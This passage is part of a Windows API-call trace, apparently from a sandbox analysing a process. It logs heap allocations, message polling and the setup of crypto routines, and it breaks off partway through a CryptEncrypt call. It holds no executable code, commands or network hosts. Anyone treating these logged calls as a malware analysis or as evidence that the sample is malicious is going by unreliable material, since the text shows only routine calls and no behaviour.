lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0263.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0263.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.684] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.684] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0263.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0263.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.684] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.684] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0263.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0263.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.685] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0263.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0263.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0263.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0263.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0263.685] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0263.685] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0263.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.685] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a30 [0263.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0263.685] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.686] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.686] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0263.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0263.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0263.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0263.686] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.686] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.687] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0263.687] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0263.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0263.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0263.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0263.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0263.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0263.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0263.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0263.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0263.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0263.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b4b) returned 0xe50048 [0263.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0263.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0263.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0263.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0263.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0263.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0263.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0263.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0263.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0263.719] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0263.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0263.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0263.720] CryptEncrypt (in: hKey=0xa870d0, hHash=0x0, 